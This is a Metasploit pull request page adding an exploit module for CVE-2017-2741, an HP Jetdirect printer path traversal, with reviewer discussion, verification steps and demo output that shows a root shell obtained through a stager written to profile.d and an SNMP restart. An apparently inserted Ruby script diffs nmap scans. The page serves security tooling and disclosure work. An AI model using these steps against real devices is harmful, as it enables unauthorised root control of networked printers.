
HP Jetdirect Path Traversal Arbitrary Code Execution CVE-2017-2741 #9364

Merged: 19 commits, Aug 24, 2018

Conversation

@mkienow-r7 (Contributor) commented Jan 1, 2018

Adds exploit module for HP Jetdirect path traversal arbitrary code execution (CVE-2017-2741) and BusyBox telnetd bind TCP Unix command shell payload. The payload uses the recently introduced CommandShellCleanupCommand advanced option from #9353.

Verification

  • Start msfconsole
  • use exploit/linux/misc/hp_jetdirect_path_traversal
  • set rhost <hostname>
  • exploit
  • Verify a command shell session is opened
  • Press Ctrl-C and respond yes to abort the session
  • Verify telnetd is no longer listening on LPORT
  • Document module documentation/modules/exploit/linux/misc/hp_jetdirect_path_traversal.md
  • Document payload documentation/modules/payload/cmd/unix/bind_busybox_telnetd.md

Demonstration

The following demonstrates the exploit against a vulnerable HP OfficeJet Pro 8210 printer.

msf > use exploit/linux/misc/hp_jetdirect_path_traversal
msf exploit(linux/misc/hp_jetdirect_path_traversal) > set rhost 192.168.1.107
rhost => 192.168.1.107
msf exploit(linux/misc/hp_jetdirect_path_traversal) > exploit

[*] 192.168.1.107:9100 - Exploiting...
[*] Started bind handler
[*] 192.168.1.107:9100 - Connecting to port 9100...
[*] 192.168.1.107:9100 - Attempting to write command stager...
[+] 192.168.1.107:9100 - Successfully wrote command stager to 0:/../../rw/var/etc/profile.d/dLDZtDsh.sh
[*] 192.168.1.107:161 - Connecting to SNMP port 161...
[*] 192.168.1.107:161 - Initial value of prtGeneralReset OID 1.3.6.1.2.1.43.5.1.1.3.1 => 3
[*] 192.168.1.107:161 - Attempting to restart printer via SNMP...
[*] 192.168.1.107:161 - Set prtGeneralReset OID 1.3.6.1.2.1.43.5.1.1.3.1 => 4
[*] 192.168.1.107:161 - Current value of prtGeneralReset OID 1.3.6.1.2.1.43.5.1.1.3.1 => 3
[*] 192.168.1.107:161 - Printer restarting...
[*] Command shell session 1 opened (192.168.1.101:38141 -> 192.168.1.107:4444) at 2017-12-31 21:09:40 -0600

[root@HPC2A3FB ]# id
id
uid=0(root) gid=0(root)
[root@HPC2A3FB ]# uname -a
uname -a
Linux HPC2A3FB 3.14.32 #001.1614A Wed Mar 30 16:58:30 PDT 2016 armv7l GNU/Linux
[root@HPC2A3FB ]# ^C
Abort session 1? [y/N]  y

[*] 192.168.1.107 - Command shell session 1 closed.  Reason: User exit
msf exploit(linux/misc/hp_jetdirect_path_traversal) > 

Port Scan Before Aborting Session

$ nmap 192.168.1.107

Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 21:17 CST
Nmap scan report for 192.168.1.107
Host is up (0.0011s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
515/tcp  open  printer
631/tcp  open  ipp
4444/tcp open  krb524
8080/tcp open  http-proxy
9100/tcp open  jetdirect

Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds

Port Scan After Aborting Session

$ nmap 192.168.1.107

Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 21:18 CST
Nmap scan report for 192.168.1.107
Host is up (0.0011s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
80/tcp   open  http
443/tcp  open  https
515/tcp  open  printer
631/tcp  open  ipp
8080/tcp open  http-proxy
9100/tcp open  jetdirect

Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds

🔺 Only one HP OfficeJet Pro 8210 printer was bricked in the development of this exploit module.
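The two nmap scans above are the manual form of the verification step "telnetd is no longer listening on LPORT". Below is an added example, written for this thread and not code from the Metasploit module or the PR author, that parses nmap normal output for two scans of the same host and reports which ports opened, closed, or changed state between them, with a dedicated check for the bind port. The sample scans are constructed from the output shapes shown in the PR; the function names and the port 4444 default are assumptions for illustration.

```ruby
# Added example (not part of the Metasploit PR): diff two nmap normal-output
# scans of the same host so the cleanup of a bind listener can be checked
# mechanically rather than by eye.

# Constructed sample input, modelled on the two scans shown in the PR text.
SCAN_DURING_SESSION = <<~NMAP
  Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 21:17 CST
  Nmap scan report for 192.168.1.107
  Host is up (0.0011s latency).
  Not shown: 993 closed ports
  PORT     STATE SERVICE
  80/tcp   open  http
  443/tcp  open  https
  515/tcp  open  printer
  631/tcp  open  ipp
  4444/tcp open  krb524
  8080/tcp open  http-proxy
  9100/tcp open  jetdirect

  Nmap done: 1 IP address (1 host up) scanned in 0.04 seconds
NMAP

SCAN_AFTER_ABORT = <<~NMAP
  Starting Nmap 7.01 ( https://nmap.org ) at 2017-12-31 21:18 CST
  Nmap scan report for 192.168.1.107
  Host is up (0.0011s latency).
  Not shown: 994 closed ports
  PORT     STATE SERVICE
  80/tcp   open  http
  443/tcp  open  https
  515/tcp  open  printer
  631/tcp  open  ipp
  8080/tcp open  http-proxy
  9100/tcp open  jetdirect

  Nmap done: 1 IP address (1 host up) scanned in 0.05 seconds
NMAP

# One row of the "PORT STATE SERVICE" table, e.g. "4444/tcp open  krb524".
PORT_ROW = %r{\A(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)}

# Returns a hash keyed by "port/proto", e.g.
# { "4444/tcp" => { state: "open", service: "krb524" }, ... }
def parse_nmap_ports(text)
  text.each_line.with_object({}) do |line, ports|
    m = PORT_ROW.match(line.strip)
    next unless m
    ports["#{m[1]}/#{m[2]}"] = { state: m[3], service: m[4] }
  end
end

# Numeric sort on the port part of "port/proto" keys.
def sort_ports(keys)
  keys.sort_by { |k| k.to_i }
end

# Compares two scans of the same host. Ports nmap does not list were closed
# ("Not shown: N closed ports"), so a key missing on one side means that port
# was closed in that scan.
def diff_scans(before_text, after_text)
  before = parse_nmap_ports(before_text)
  after  = parse_nmap_ports(after_text)
  {
    opened: sort_ports(after.keys - before.keys),
    closed: sort_ports(before.keys - after.keys),
    changed: sort_ports((before.keys & after.keys).select { |k| before[k][:state] != after[k][:state] })
  }
end

# The cleanup check from the PR's verification list (hypothetical helper name):
# the bind port must have been open while the session was up and must be
# absent, i.e. closed, afterwards.
def listener_gone?(before_text, after_text, port, proto = "tcp")
  key = "#{port}/#{proto}"
  before = parse_nmap_ports(before_text)
  after  = parse_nmap_ports(after_text)
  before.dig(key, :state) == "open" && !after.key?(key)
end

if $PROGRAM_NAME == __FILE__
  d = diff_scans(SCAN_DURING_SESSION, SCAN_AFTER_ABORT)
  puts "opened:  #{d[:opened].join(', ')}"
  puts "closed:  #{d[:closed].join(', ')}"
  puts "changed: #{d[:changed].join(', ')}"
  puts "LPORT 4444 cleaned up: #{listener_gone?(SCAN_DURING_SESSION, SCAN_AFTER_ABORT, 4444)}"
end
```

Run with two saved scans (`nmap -oN before.txt host` during the session and `nmap -oN after.txt host` after aborting it) and feed the file contents to `diff_scans`; a non-empty `:opened` list, or `listener_gone?` returning false, means the cleanup command did not remove the listener.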

@wchen-r7 (Contributor) commented Jan 4, 2018

Excellent job @mkienow-r7

},
'Author' => [
'Jacob Baines', # Python PoC
'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
Contributor

Ah, next time remember to add your e-mail to https://github.com/rapid7/metasploit-framework/blob/master/.mailmap, that way you won't need to manually put your e-mail here all the time :-)

Contributor Author

Awesome!

def exploit
begin
print_status("Exploiting...")
if target.name =~ /Unix/
Contributor

Hmm, excuse me if I'm missing something obvious.... as far as I can tell this condition is always true, right? Because you only have one target that is Unix. Is the module actually using the else block?

Contributor Author

@mkienow-r7 mkienow-r7 Jan 4, 2018

Yes, that is currently true. I was hoping we would eventually be able to get an ELF stager to run, which would use a different target name and drop into the else calling the execute_cmdstager method.

Contributor

Gotcha! :-)


Impacted printers have a firmware version below 1708D.

| Product Name | Model |
Contributor

Have you tried to view this with info -d? I don't think this format works well :-(

Contributor Author

I didn't. Thanks for pointing that out as I had quickly created Markdown that I tested with GitHub.

@mkienow-r7 (Contributor Author) commented Jan 6, 2018

I forgot to note that all corrections per my conversation with @wvu-r7 are complete.

allow(tmp_sock).to receive(:put).with(an_instance_of(String))
allow(tmp_sock).to receive(:get).with(Rex::Proto::PJL::DEFAULT_TIMEOUT).and_return(response)
tmp_cli = Rex::Proto::PJL::Client.new(tmp_sock)
expect(tmp_cli.fsdownload("Miscellaneous Data", "1:root/.workspace/.garbage.", is_file: false)).to eq(true)

@asoto-r7 (Contributor) commented Jul 2, 2018

Unfortunately, a conversation from Slack wasn't transferred here, so I'm catching up now.

Per a discussion with @wvu, this PR is blocked, pending landing of #9356. I had issues testing #9356, and dropped the ball, which I'm just picking up this week. For details:

#9356 (comment)

@mkienow-r7 force-pushed the cve-2017-2741-hp-officejet-pro-exploit branch from 70718b8 to ecc6c47 on August 23, 2018 19:51
@wvu wvu merged commit 7a53470 into rapid7:master Aug 24, 2018
wvu added a commit that referenced this pull request Aug 24, 2018
@wvu (Contributor) commented Aug 24, 2018

Release Notes

This adds an exploit for CVE-2017-2741 against HP printers using the PJL (JetDirect) and SNMP protocols.

msjenkins-r7 pushed a commit that referenced this pull request Aug 24, 2018
@mkienow-r7 mkienow-r7 deleted the cve-2017-2741-hp-officejet-pro-exploit branch August 24, 2018 13:27